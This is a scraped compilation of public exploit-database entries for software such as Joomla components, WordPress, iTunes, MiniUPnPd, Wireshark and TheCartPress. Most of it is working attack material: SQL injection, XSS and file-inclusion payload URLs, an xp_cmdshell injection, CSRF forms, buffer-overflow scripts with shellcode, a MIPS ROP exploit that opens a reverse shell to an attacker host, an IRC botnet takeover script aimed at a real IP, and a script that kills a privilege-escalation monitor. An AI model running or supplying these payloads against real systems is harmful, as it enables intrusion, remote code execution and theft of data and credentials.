HireHackking

source: https://www.securityfocus.com/bid/52063/info Impulsio CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/index.php?id=[SQL]

source: https://www.securityfocus.com/bid/52076/info Endian Firewall is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these issues could allow an attacker to execute arbitrary script on the affected server and steal cookie-based authentication credentials. Other attacks are also possible. https://www.example.com/cgi-bin/dnat.cgi#createrule[XSS]

source: https://www.securityfocus.com/bid/52077/info The X-Shop component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/index.php?option=com_x-shop&action=artdetail&idd='

source: https://www.securityfocus.com/bid/52076/info Endian Firewall is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these issues could allow an attacker to execute arbitrary script on the affected server and steal cookie-based authentication credentials. Other attacks are also possible. https://www.example.com/cgi-bin/dansguardian.cgi#addrule[XSS]

# # legend_rce.py # Legend Perl IRC Bot Remote Code Execution PoC # author: Jay Turla ( @shipcod3 ) # description: This is a RCE PoC for Legend Bot which has been used in the Shellshock spam October 2014. # reference: http://www.csoonline.com/article/2839054/vulnerabilities/report-criminals-use-shellshock-against-mail-servers-to-build-botnet.html # greetz to ROOTCON (rootcon.org) goons # import socket import sys def usage(): print("USAGE: python legend_rce.py nick") print("Sample nicks found in the wild: god, ARZ, Zax, HackTech, TheChozen") def main(argv): if len(argv) < 2: return usage() #irc server connection settings botnick = sys.argv[1] #admin payload for taking over the Legend Bot server = "80.246.50.71" #irc server channel = "#Apache" #channel where the bot is located irc = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #defines the socket print "connecting to:"+server irc.connect((server, 2015)) #connects to the server, you can change the port by changing 2015 for example :) irc.send("USER "+ botnick +" "+ botnick +" "+ botnick +" :legend.rocks\n") #user authentication irc.send("NICK "+ botnick +"\n") #sets nick irc.send("JOIN "+ channel +"\n") #join the chan irc.send("PRIVMSG "+channel+" :!legend @system 'uname -a' \n") #send the payload to the bot while 1: #puts it in a loop text=irc.recv(2040) #receive the text print text #print text to console if text.find('PING') != -1: #check if 'PING' is found irc.send('PONG ' + text.split() [1] + '\r\n') #returns 'PONG' back to the server (prevents pinging out!) if text.find('!quit') != -1: #quit the Bot irc.send ("QUIT\r\n") sys.exit() if text.find('Linux') != -1: irc.send("PRIVMSG "+channel+" :The bot answers to "+botnick+" which allows command execution \r\n") irc.send ("QUIT\r\n") sys.exit() if __name__ == "__main__": main(sys.argv)

source: https://www.securityfocus.com/bid/52078/info The Xcomp component for Joomla! is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible. http://www.example.com/index.php?option=com_xcomp&controller=../../[LFI]%00

# Exploit Title: Apple Itunes PLS title buffer overflow # Date: April 26 ,2015 (Day of disclosing this exploit code) # Exploit Author: Fady Mohamed Osman (@fady_osman) # Vendor Homepage: http://www.apple.com # Software Link: http://www.apple.com/itunes/download/?id=890128564 # Version: 10.6.1.7 # Tested on: Windows Xp sp3 # Exploit-db : http://www.exploit-db.com/author/?a=2986 # Youtube : https://www.youtube.com/user/cutehack3r header = "[Playlist]\r\n" header << "NumberOfEntries=1\r\n" header << "File1=http://www.panix.com/web/faq/multimedia/sample.mp3\r\n" header << "Title1=" nseh_longer = "\xeb\x1E\x90\x90" nseh_shorter = "\xeb\x06\x90\x90" seh = 0x72d119de #pop pop ret from msacm32.drv shell = "\xdd\xc1\xd9\x74\x24\xf4\xbb\x2b\x2b\x88\x37\x5a\x31\xc9" + "\xb1\x33\x83\xea\xfc\x31\x5a\x13\x03\x71\x38\x6a\xc2\x79" + "\xd6\xe3\x2d\x81\x27\x94\xa4\x64\x16\x86\xd3\xed\x0b\x16" + "\x97\xa3\xa7\xdd\xf5\x57\x33\x93\xd1\x58\xf4\x1e\x04\x57" + "\x05\xaf\x88\x3b\xc5\xb1\x74\x41\x1a\x12\x44\x8a\x6f\x53" + "\x81\xf6\x80\x01\x5a\x7d\x32\xb6\xef\xc3\x8f\xb7\x3f\x48" + "\xaf\xcf\x3a\x8e\x44\x7a\x44\xde\xf5\xf1\x0e\xc6\x7e\x5d" + "\xaf\xf7\x53\xbd\x93\xbe\xd8\x76\x67\x41\x09\x47\x88\x70" + "\x75\x04\xb7\xbd\x78\x54\xff\x79\x63\x23\x0b\x7a\x1e\x34" + "\xc8\x01\xc4\xb1\xcd\xa1\x8f\x62\x36\x50\x43\xf4\xbd\x5e" + "\x28\x72\x99\x42\xaf\x57\x91\x7e\x24\x56\x76\xf7\x7e\x7d" + "\x52\x5c\x24\x1c\xc3\x38\x8b\x21\x13\xe4\x74\x84\x5f\x06" + "\x60\xbe\x3d\x4c\x77\x32\x38\x29\x77\x4c\x43\x19\x10\x7d" + "\xc8\xf6\x67\x82\x1b\xb3\x98\xc8\x06\x95\x30\x95\xd2\xa4" + "\x5c\x26\x09\xea\x58\xa5\xb8\x92\x9e\xb5\xc8\x97\xdb\x71" + "\x20\xe5\x74\x14\x46\x5a\x74\x3d\x25\x3d\xe6\xdd\x84\xd8" + "\x8e\x44\xd9" #1020 --> offset in local exploits payload = header + "A" * 1020 + nseh_shorter + [seh].pack('V') + shell #380 or 404 (if itunes wasn't already loaded)--> offset in remote ones using the itms protocol. payload_remote = header + "A" * 380 + nseh_longer + [seh].pack('V') + "A" * 16 + nseh_shorter + [seh].pack('V') + shell # when using as local exploit open('exploit.pls', 'w') { |f| f.puts payload } puts('local file created') # place this in a web server and use the itms:// protocol to load it. open('exploit_remote.pls', 'w') { |f| f.puts payload_remote } puts('remote file created')

#!/usr/bin/env python # Exploit Title: MiniUPnPd 1.0 Stack Overflow RCE for AirTies RT Series # Date: 26.04.2015 # Exploit Author: Onur ALANBEL (BGA) # Vendor Homepage: http://miniupnp.free.fr/ # Version: 1.0 # Architecture: MIPS # Tested on: AirTies RT-204v3 # CVE : 2013-0230 # Exploit gives a reverse shell to lhost:lport # Details: https://www.exploit-db.com/docs/english/36806-developing-mips-exploits-to-hack-routers.pdf import urllib2 from string import join from argparse import ArgumentParser from struct import pack from socket import inet_aton BYTES = 4 def hex2str(value, size=BYTES): data = "" for i in range(0, size): data += chr((value >> (8*i)) & 0xFF) data = data[::-1] return data arg_parser = ArgumentParser(prog="miniupnpd_mips.py", description="MiniUPnPd \ CVE-2013-0230 Reverse Shell exploit for AirTies \ RT Series, start netcat on lhost:lport") arg_parser.add_argument("--target", required=True, help="Target IP address") arg_parser.add_argument("--lhost", required=True, help="The IP address\ which nc is listening") arg_parser.add_argument("--lport", required=True, type=int, help="The\ port which nc is listening") args = arg_parser.parse_args() libc_base = 0x2aabd000 ra_1 = hex2str(libc_base + 0x36860) # ra = 1. gadget s1 = hex2str(libc_base + 0x1636C) # s1 = 2. gadget sleep = hex2str(libc_base + 0x35620) # sleep function ra_2 = hex2str(libc_base + 0x28D3C) # ra = 3. gadget s6 = hex2str(libc_base + 0x1B19C) # ra = 4.gadget s2 = s6 lport = pack('>H', args.lport) lhost = inet_aton(args.lhost) shellcode = join([ "\x24\x11\xff\xff" "\x24\x04\x27\x0f" "\x24\x02\x10\x46" "\x01\x01\x01\x0c" "\x1e\x20\xff\xfc" "\x24\x11\x10\x2d" "\x24\x02\x0f\xa2" "\x01\x01\x01\x0c" "\x1c\x40\xff\xf8" "\x24\x0f\xff\xfa" "\x01\xe0\x78\x27" "\x21\xe4\xff\xfd" "\x21\xe5\xff\xfd" "\x28\x06\xff\xff" "\x24\x02\x10\x57" "\x01\x01\x01\x0c" "\xaf\xa2\xff\xff" "\x8f\xa4\xff\xff" "\x34\x0f\xff\xfd" "\x01\xe0\x78\x27" "\xaf\xaf\xff\xe0" "\x3c\x0e" + lport + "\x35\xce" + lport + "\xaf\xae\xff\xe4" "\x3c\x0e" + lhost[:2] + "\x35\xce" + lhost[2:4] + "\xaf\xae\xff\xe6" "\x27\xa5\xff\xe2" "\x24\x0c\xff\xef" "\x01\x80\x30\x27" "\x24\x02\x10\x4a" "\x01\x01\x01\x0c" "\x24\x0f\xff\xfd" "\x01\xe0\x78\x27" "\x8f\xa4\xff\xff" "\x01\xe0\x28\x21" "\x24\x02\x0f\xdf" "\x01\x01\x01\x0c" "\x24\x10\xff\xff" "\x21\xef\xff\xff" "\x15\xf0\xff\xfa" "\x28\x06\xff\xff" "\x3c\x0f\x2f\x2f" "\x35\xef\x62\x69" "\xaf\xaf\xff\xec" "\x3c\x0e\x6e\x2f" "\x35\xce\x73\x68" "\xaf\xae\xff\xf0" "\xaf\xa0\xff\xf4" "\x27\xa4\xff\xec" "\xaf\xa4\xff\xf8" "\xaf\xa0\xff\xfc" "\x27\xa5\xff\xf8" "\x24\x02\x0f\xab" "\x01\x01\x01\x0c" ], '') payload = 'C'*2052 + s1 + 'C'*(4*4) + s6 + ra_1 + 'C'*28 + sleep + 'C'*40 + s2\ + ra_2 + 'C'*32 + shellcode soap_headers = { 'SOAPAction': "n:schemas-upnp-org:service:WANIPConnection:1#" + payload, } soap_data = """ <?xml version='1.0' encoding="UTF-8"?> <SOAP-ENV:Envelope SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" > <SOAP-ENV:Body> <ns1:action xmlns:ns1="urn:schemas-upnp-org:service:WANIPConnection:1"\ SOAP-ENC:root="1"> </ns1:action> </SOAP-ENV:Body> </SOAP-ENV:Envelope> """ try: print "Exploiting..." req = urllib2.Request("http://" + args.target + ":5555", soap_data, soap_headers) res = urllib2.urlopen(req).read() except: print "Ok"

#!/usr/bin/python # EXPLOIT TITLE: WIRESHARK <=1.12.4 Access Violation and Memory Corruption PoC # AUTHOR: Avinash Kumar Thapa "-Acid" # Date of Testing: 26th April'2015 # Vendor Homepage: http://www.wireshark.org # Tested On : Windows 8.1 Pro # Steps to Reproduce the Crash # Step 1: Create a File Using PoC # Step 2: Go to wirehshark and in filter field, put ip.addr=={Buffer} # Step 3: Click "Apply" # Some other places for the Crash are: # Statistics > IP Statistics then any of the field you can use. # Statistics > Packet Length > Paste the buffer in the field # Statistics > ANCP # Statistics > Collectd # Statistics > Compared # Statistis > buffer = "A"*80000 file = open("wireshark.txt","w") file.write(buffer) file.close() print "POC Created by -Acid" print " Email: acid.exploit@gmail.com"

# Exploit Title: UniPDF v1.2 BufferOverflow, SEH overwrite DoS PoC # Author : Avinash Kumar Thapa "-Acid" # Date of Testing : 25th April 2015 # Tested On : Windows XP- Service Pack 3 && Windows 7 Home Basic # Vendor Homepage: http://unipdf.com/ # Software Link: http://unipdf.com/file/unipdf-setup.exe # Steps to reproduce the Crash is: # Step 1: Run the POC # Step 2: Go to local Disk C:\Program Files\UniPDF and copy the POC there # Step 3 : Run the UniPdf.exe buff2 = "\x41" * 3000 crash = " <config>\n" crash += " <UserDefine>\n" crash += "<Language ID=\"0\" />\n" crash += "<Path PathSet=\""+buff2+"\" Path=\"\" />\n" crash += "<ImageFormat set=\"2\" />\n" crash += "<Res set=\"96\" />\n" crash += "<bit set=\"24\" />\n" crash += "<Prefix set=\"\" />\n" crash += "<Doc set=\"1\" />\n" crash += "<Help set=\"1\" />\n" crash += "</UserDefine>\n" crash += "</config>\n" print "POC Created By -Acid" print " acid.exploit@gmail.com" file = open("update.xml","w") file.write(crash) file.close()

# Exploit Title: Stored Cross-Site Scripting (XSS) in OTRS # Date: 28.01.2014 # Exploit Author: Adam Ziaja http://adamziaja.com # Vendor Homepage: https://www.otrs.com # Version: 3.1.x before 3.1.20, 3.2.x before 3.2.15, and 3.3.x before 3.3.5 # CVE : CVE-2014-1695 #!/usr/bin/perl -w use strict; use MIME::Lite; my $msg = MIME::Lite->new( Subject => 'OTRS XSS PoC', From => 'attacker@example.com', To => 'otrs@example.com', Type => 'text/html', Data => '<html><body><img/onerror="alert(\'XSS1\')"src=a><iframe src=javasc&#x72ipt:alert(\'XSS2\') ></body></html>' ); $msg->send();

Source: http://klikki.fi/adv/wordpress2.html ## Overview Current versions of WordPress are vulnerable to a stored XSS. An unauthenticated attacker can inject JavaScript in WordPress comments. The script is triggered when the comment is viewed. If triggered by a logged-in administrator, under default settings the attacker can leverage the vulnerability to execute arbitrary code on the server via the plugin and theme editors. Alternatively the attacker could change the administrator’s password, create new administrator accounts, or do whatever else the currently logged-in administrator can do on the target system. ## Details If the comment text is long enough, it will be truncated when inserted in the database. The MySQL TEXT type size limit is 64 kilobytes, so the comment has to be quite long. The truncation results in malformed HTML generated on the page. The attacker can supply any attributes in the allowed HTML tags, in the same way as with the two recently published stored XSS vulnerabilities affecting the WordPress core. The vulnerability bears a similarity to the one reported by Cedric Van Bockhaven in 2014 (patched this week, after 14 months). Instead of using an invalid character to truncate the comment, this time an excessively long comment is used for the same effect. In these two cases, the injected JavaScript apparently can't be triggered in the administrative Dashboard so these exploits seem to require getting around comment moderation e.g. by posting one harmless comment first. The similar vulnerability released by Klikki in November 2014 could be exploited in the administrative Dashboard while the comment is still in the moderation queue. Some exploit attempts of this have been recently reported in the wild. ## Proof of Concept Enter as a comment text: <a title='x onmouseover=alert(unescape(/hello%20world/.source)) style=position:absolute;left:0;top:0;width:5000px;height:5000px AAAAAAAAAAAA...[64 kb]..AAA'></a> Confirmed vulnerable: WordPress 4.2, 4.1.2, 4.1.1, 3.9.3. Tested with MySQL versions 5.1.53 and 5.5.41. ## Demo https://www.youtube.com/watch?v=OCqQZJZ1Ie4

source: https://www.securityfocus.com/bid/52079/info Tiki Wiki CMS Groupware is prone to a URI-redirection vulnerability because the application fails to properly sanitize user-supplied input. A successful exploit may aid in phishing attacks; other attacks are possible. http://www.example.com/tiki-featured_link.php?type=f&url=http://www.example2.com

# iFTP 2.21 SEH overwritten Crash PoC # Author: Avinash Kumar Thapa "-Acid" # Date of Testing : 28th April'2015 # Vendor's home page: http://www.memecode.com/iftp.php # Software's Url: http://www.memecode.com/data/iftp-win32-v2.21.exe # Crash Point: Go to Schedule > Schedule download > {+} >Time field buffer = "A"*600 buffer += "BBBB" # Pointer to Next SEH Record buffer += "CCCC" # SEH HANDLER file = "test.txt" f = open(file, "w") f.write(buffer) f.close()

source: https://www.securityfocus.com/bid/52081/info VOXTRONIC Voxlog Professional is prone to a file-disclosure vulnerability and multiple SQL-injection vulnerabilities because it fails to properly sanitize user-supplied input. An remote attacker can exploit these issues to obtain potentially sensitive information from local files on computers running the vulnerable application, or modify the logic of SQL queries. A successful exploit may allow the attacker to compromise the software, retrieve information, or modify data; These may aid in further attacks. VOXTRONIC Voxlog Professional 3.7.2.729 and 3.7.0.633 are vulnerable; other versions may also be affected. http://www.example.com/voxlog/GET.PHP?v=ZmlsZT1DOi9ib290LmluaQ==

source: https://www.securityfocus.com/bid/52081/info VOXTRONIC Voxlog Professional is prone to a file-disclosure vulnerability and multiple SQL-injection vulnerabilities because it fails to properly sanitize user-supplied input. An remote attacker can exploit these issues to obtain potentially sensitive information from local files on computers running the vulnerable application, or modify the logic of SQL queries. A successful exploit may allow the attacker to compromise the software, retrieve information, or modify data; These may aid in further attacks. VOXTRONIC Voxlog Professional 3.7.2.729 and 3.7.0.633 are vulnerable; other versions may also be affected. http://www.example.com/voxlog/sysstat/userlogdetail.php?load=1&idclient[1]=xxx);waitfor delay '0:0:5' --+ http://www.example.com/voxlog/sysstat/userlogdetail.php?load=1&idclient[1]=xxx);exec master..xp_cmdshell 'xxxxx' --+

source: https://www.securityfocus.com/bid/52085/info F*EX is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these issues could allow an attacker to execute arbitrary script on the affected server and steal cookie-based authentication credentials. Other attacks are also possible. http://www.example.com/fup [id parameter] http://www.example.com/fup [to parameter] http://www.example.com/fup [from parameter]

source: https://www.securityfocus.com/bid/52086/info TestLink is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. http://www.example.com/lib/ajax/getrequirementnodes.php?root_node=1 OR 1=1 http://www.example.com/lib/ajax/gettprojectnodes.php?root_node=4 OR 1=1 http://www.example.com/lib/cfields/cfieldsEdit.php?do_action=edit&cfield_id=1 AND 3653=BENCHMARK(5000000,MD5(1)) http://www.example.com/lib/plan/planMilestonesEdit.php?doAction=edit&id=7 AND 5912=BENCHMARK(5000000,MD5(1)) http://www.example.com/lib/plan/planMilestonesEdit.php?doAction=create&tplan_id=2623 AND 5912=BENCHMARK(5000000,MD5(1)) http://www.example.com/lib/requirements/reqEdit.php?doAction=create&req_spec_id=2622 AND 5912=BENCHMARK(5000000,MD5(1)) http://www.example.com/lib/requirements/reqImport.php?req_spec_id=2622 AND 5912=BENCHMARK(5000000,MD5(1)) http://www.example.com/lib/requirements/reqSpecAnalyse.php?req_spec_id=2622 OR 1=1 http://www.example.com/lib/requirements/reqSpecPrint.php?req_spec_id=2622 AND 5912=BENCHMARK(5000000,MD5(1)) http://www.example.com/lib/requirements/reqSpecView.php?req_spec_id=2622 AND 5912=BENCHMARK(5000000,MD5(1))

source: https://www.securityfocus.com/bid/52088/info Dolphin is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. Dolphin 7.0.7 and prior versions are vulnerable. http://www.example.com/dolph/viewFriends.php?iUser=1&page=1&per_page=32&sort=activity&photos_only='"><script>alert(/xss/)</script> http://www.example.com/dolph/viewFriends.php?iUser=1&page=1&per_page=32&sort=activity&online_only='"><script>alert(/xss/)</script> http://www.example.com/dolph/viewFriends.php?iUser=1&page=1&sort=activity&mode='"><script>alert(/xss/)</script>

source: https://www.securityfocus.com/bid/52088/info Dolphin is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. Dolphin 7.0.7 and prior versions are vulnerable. http://www.example.com/dolph/explanation.php?explain=%27%22%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E

#[Title] Ninja privilege escalation detection and prevention system race condition #[Author] Ben 'highjack' Sheppard #[URL] http://highjack.github.io/ #[Description] There is a small delay between the time of execution of a command and the time privelege escalation is detected. #It is therefore possible to use a pty to run a command such as su and provide the password faster than it can be detected. #The following PoC becomes root using su and issues killall -9 ninja. The attacker can then run any commands that they wish. #[Software Link] http://forkbomb.org/ninja/ #[Date] 29/04/2015 #[Version] 0.1.3 #[Tested on] Kali Linux #[Demo] https://www.youtube.com/watch?v=P8VJCUUJPLg #See me hitting every open port, 'cause im banging on their system while I'm staying out of the court #https://www.youtube.com/watch?v=eA136fOsSeQ import pty, os, sys, subprocess pid, fd = pty.fork() #begin config user = "root" password = "mypassword" #change this :) command = "killall -9 ninja" #end config def usage(): print """ @@@ @@@ @@@ @@@@@@@@ @@@ @@@ @@@ @@@@@@ @@@@@@@ @@@ @@@ @@@ @@@ @@@ @@@@@@@@@ @@@ @@@ @@@ @@@@@@@@ @@@@@@@@ @@@ @@@ @@! @@@ @@! !@@ @@! @@@ @@! @@! @@@ !@@ @@! !@@ !@! @!@ !@! !@! !@! @!@ !@! !@! @!@ !@! !@! @!! @!@!@!@! !!@ !@! @!@!@ @!@!@!@! !!@ @!@!@!@! !@! @!@@!@! !!!@!!!! !!! !!! !!@!! !!!@!!!! !!! !!!@!!!! !!! !!@!!! !!: !!! !!: :!! !!: !!: !!! !!: !!: !!! :!! !!: :!! :!: !:! :!: :!: !:: :!: !:! !!: :!: :!: !:! :!: :!: !:! :: ::: :: ::: :::: :: ::: ::: : :: :: ::: ::: ::: :: ::: : : : : :: :: : : : : : ::: : : : :: :: : : ::: [Title] Ninja privilege escalation detection and prevention system 0.1.3 race condition [Author] Ben 'highjack' Sheppard [URL] http://highjack.github.io/ [Description] There is a small delay between the time of execution of a command and the time privelege escalation is detected. It is therefore possible to use a pty to run a command such as su and provide the password faster than it can be detected. The following PoC becomes root using su and issues killall -9 ninja. The attacker can then run any commands that they wish. """ executions = 0 def check_procs(): p1 = subprocess.Popen(["ps", "aux"], stdout=subprocess.PIPE) p2 = subprocess.Popen(["grep", "root"], stdin=p1.stdout, stdout=subprocess.PIPE) p3 = subprocess.Popen(["grep", "/sbin/ninja"], stdin=p2.stdout, stdout=subprocess.PIPE) output = p3.communicate()[0] if output != "": if executions != 0: sys.exit(0) return True else: return False def kill_ninja(): if pid == 0: os.execvp("su", ["su", user, "-c", command]) elif pid > 0: try: os.read(fd, 1024) os.write(fd, password + "\n") os.read(fd,1024) os.wait() os.close(fd) except: usage() print "[+] Ninja is terminated" sys.exit(0) while True: kill_ninja() if (check_procs == True): executions = executions + 1 kill_ninja()

source: https://www.securityfocus.com/bid/52091/info The 'com_xvs' component for Joomla! is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this vulnerability to obtain potentially sensitive information or to execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. http://www.example.com/index.php?option=com_xvs&controller=../../[LFI]%00

##################################################################################### Application: Foxit Reader PDF Parsing Memory Corruption Platforms: Windows Versions: The vulnerabilities are reported in Foxit Reader and Foxit Enterprise Reader versions 7.1.0.306 and 7.1.3.320 and Foxit Phantom PDF versions 7.1.0.306, 7.1.2.311, and 7.1.3.320. Secunia: SA63346 {PRL}: 2015-05 Author: Francis Provencher (Protek Research Lab’s) Website: http://www.protekresearchlab.com/ Twitter: @ProtekResearch ##################################################################################### 1) Introduction 2) Report Timeline 3) Technical details 4) POC ##################################################################################### =============== 1) Introduction =============== Foxit Reader is a multilingual freemium PDF tool that can create, view, edit, digitally sign, and print PDF files.[3] Early versions of Foxit Reader were notable for startup performance and small file size.[citation needed] Foxit has been compared favorably toAdobe Reader.[4][5][6] The Windows version allows annotating and saving unfinished PDF forms, FDF import/export, converting to text, highlighting and drawing. (http://en.wikipedia.org/wiki/Foxit_Reader) ##################################################################################### ============================ 2) Report Timeline ============================ 2015-04-09: Francis Provencher from Protek Research Lab’s found the issue; 2015-04-13: Foxit Security Response Team confirmed the issue; 2015-04-28: Foxit fixed the issue; ##################################################################################### ============================ 3) Technical details ============================ A memory corruption occured within the LZW algorithm that is used to decode GIF. A specifically crafted GIF could lead to a controled memory corruption. ##################################################################################### =========== 4) POC =========== http://protekresearchlab.com/exploits/PRL-2015-05.pdf https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/36859.pdf ###############################################################################

Advisory ID: HTB23254 Product: TheCartPress WordPress plugin Vendor: TheCartPress team Vulnerable Version(s): 1.3.9 and probably prior Tested Version: 1.3.9 Advisory Publication: April 8, 2015 [without technical details] Vendor Notification: April 8, 2015 Public Disclosure: April 29, 2015 Vulnerability Type: Cross-Site Scripting [CWE-79], PHP File Inclusion [CWE-98], Cross-Site Scripting [CWE-79], Improper Access Control [CWE-284] CVE References: CVE-2015-3301, CVE-2015-3300, CVE-2015-3302 Risk Level: High CVSSv2 Base Scores: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C), 5 (AV:N/AC:L/Au:N/C:N/I:P/A:N), 5 (AV:N/AC:L/Au:N/C:N/I:P/A:N), 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N) Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) ----------------------------------------------------------------------------------------------- Advisory Details: High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in TheCartPress WordPress plugin, which can be exploited to execute arbitrary PHP code, disclose sensitive data, and perform Cross-Site Scripting attacks against users of WordPress installations with the vulnerable plugin. 1) Local PHP File Inclusion in TheCartPress WordPress plugin: CVE-2015-3301 Input passed via the "tcp_box_path" HTTP POST parameter passed to "/wp-admin/admin.php?page=checkout_editor_settings" URL is not properly verified before being used in PHP 'include()' function, and can be abused to include arbitrary local files via directory traversal sequences. In order to successfully exploit the vulnerability an attacker needs to have administrator privileges on WordPress installation, however this can be also exploited via CSRF vector to which the script is vulnerable as well. Simple CSRF exploit below will execute the content of '/etc/passwd' file when a logged-in administrator will visit a page with it: <form action="http://wordpress/wp-admin/admin.php?page=checkout_editor_settings" method="post" name="main"> <input type="hidden" name="tcp_save_fields" value='1'> <input type="hidden" name="tcp_box_path" value='../../../../../etc/passwd'> <input type="submit" id="btn"> </form> <script> document.main.submit(); </script> 2) Stored XSS in TheCartPress WordPress plugin: CVE-2015-3300 During the checkout process, many user-supplied HTTP POST parameters (see complete list in PoC)in "Shipping address" and "Billing address" sections are not being sanitized before being stored in the local database. Simple mass-XSS PoC against "Billing address" section (PoC against "Shipping address" scetion is identical, just replace 'billing_' prefix with 'shipping_') will write several JS pop-up alerts into the application database: <form action="http://wordpress/shopping-cart/checkout/" method="post" name="main"> <input type="hidden" name="selected_billing_id" value='1'> <input type="hidden" name="selected_billing_address" value='new'> <input type="hidden" name="billing_firstname" value='"><script>alert(/immuniweb/);</script>'> <input type="hidden" name="billing_lastname" value='"><script>alert(/immuniweb/);</script>'> <input type="hidden" name="billing_company" value='"><script>alert(/immuniweb/);</script>'> <input type="hidden" name="billing_tax_id_number" value='"><script>alert(/immuniweb/);</script>'> <input type="hidden" name="billing_country_id" value='AF'> <input type="hidden" name="billing_region_id" value=''> <input type="hidden" name="billing_region" value=''> <input type="hidden" name="billing_city" value='"><script>alert(/immuniweb/);</script>'> <input type="hidden" name="billing_street" value='"><script>alert(/immuniweb/);</script>'> <input type="hidden" name="billing_street_2" value='"><script>alert(/immuniweb/);</script>'> <input type="hidden" name="billing_postcode" value='"><script>alert(/immuniweb/);</script>'> <input type="hidden" name="billing_telephone_1" value='"><script>alert(/immuniweb/);</script>'> <input type="hidden" name="billing_telephone_2" value='"><script>alert(/immuniweb/);</script>'> <input type="hidden" name="billing_fax" value='"><script>alert(/immuniweb/);</script>'> <input type="hidden" name="billing_email" value='mail@mail.com'> <input type="hidden" name="tcp_continue" value=''> <input type="hidden" name="tcp_step" value='1'> <input type="submit" id="btn"> </form> A non-authenticated attacker may inject malicious HTML and JS code that will be stored in the application database, and available to any non-authenticated user on the following URL: http://wordpress/wp-admin/admin-ajax.php?order_id=[order_id]&action=tcp_print_order As well as on the following URL accessible to WordPress administrator only: http://wordpress/wp-admin/admin.php?page=thecartpress/admin/OrdersListTable.php 3) Improper Access Control in TheCartPress WordPress plugin: CVE-2015-3302 Any non-authenticated user may browse orders of other users due to broken authentication mechanism. To reproduce the vulnerability an attacker shall first open the following URL: http://wordpress/shopping-cart/checkout/?tcp_checkout=ok&order_id=[order_id] And just after open the following URL to see full order details: http://wordpress/wp-admin/admin-ajax.php?order_id=[order_id]&action=tcp_print_order Moreover, the order ID can be easily predicted, as every new order ID is an incremented value of the previous one. This enables non-authenticated remote attacker to steal all currently-existing orders. 4) Multiple XSS in TheCartPress WordPress plugin (against administrator only): CVE-2015-3300 4.1 Input passed via the "search_by" GET parameter to "/wp-admin/admin.php?page=thecartpress/admin/AddressesList.php" is not properly sanitised before being returned to the user. A remote attacker can trick logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website. http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AddressesList.php&search_by=--%3E%%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E 4.2 Input passed via the "address_id", "address_name", "firstname", "lastname", "street", "city", "postcode", "email" GET parameters to "/wp-admin/admin.php?page=thecartpress/admin/AddressEdit.php" is not properly sanitised before being returned to the user. A remote attacker can trick logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website. http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AddressEdit.php&address_id=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AddressEdit.php&address_name=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AddressEdit.php&firstname=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AddressEdit.php&lastname=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AddressEdit.php&street=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AddressEdit.php&city=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AddressEdit.php&postcode=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AddressEdit.php&email=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E 4.3 Input passed via the "post_id" and "rel_type" GET parameters to "/wp-admin/admin.php?page=thecartpress/admin/AssignedCategoriesList.php" is not properly sanitised before being returned to the user. A remote attacker can trick logged-in administrator to open a specially crafted link and execute arbitrary HTML and 